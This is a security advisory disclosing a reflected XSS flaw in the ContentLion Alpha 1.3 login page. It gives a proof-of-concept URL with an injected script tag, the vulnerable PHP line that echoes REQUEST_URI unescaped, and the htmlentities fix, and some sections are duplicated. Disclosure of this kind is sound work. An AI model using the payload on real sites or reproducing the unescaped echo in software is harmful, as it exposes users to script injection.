SSCHADV2012-004 - ContentLion Alpha 1.3 XSS vulnerability
Advisory:
|
ContentLion Alpha 1.3 XSS vulnerability
|
Advisory ID: | SSCHADV2012-004 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on ContentLion Alpha 1.3 |
Vendor URL: | |
Vendor Status: |
informed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
ContentLion Alpha 1.3 is prone to a XSS vulnerability in the login page
==============
PoC-Exploit
==============
http://[target]/contentlion-alpha-1-3/login.html?’"</script><script>alert(‘JaVaScr1pT’)</script>
// vuln code in system/classes/login.php
PoC-Exploit
==============
http://[target]/contentlion-alpha-1-3/login.html?’"</script><script>alert(‘JaVaScr1pT’)</script>
// vuln code in system/classes/login.php
if($_SESSION[‘user’]->isGuest()){ ?> <form action="<?PHP echo $_SERVER[‘REQUEST_URI’]; ?>" method="POST"> |
=====
Solution
=====
Solution
=====
if($_SESSION[‘user’]->isGuest()){ ?> <form action="<?PHP echo htmlentities($_SERVER[‘REQUEST_URI’]); ?>" method="POST"> |
Disclosure Timeline
================
01-Feb-2012 – vendor informed
01-Feb-2012 – feedback from vendor
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-004.txt
Comments
Display comments as Linear | Threaded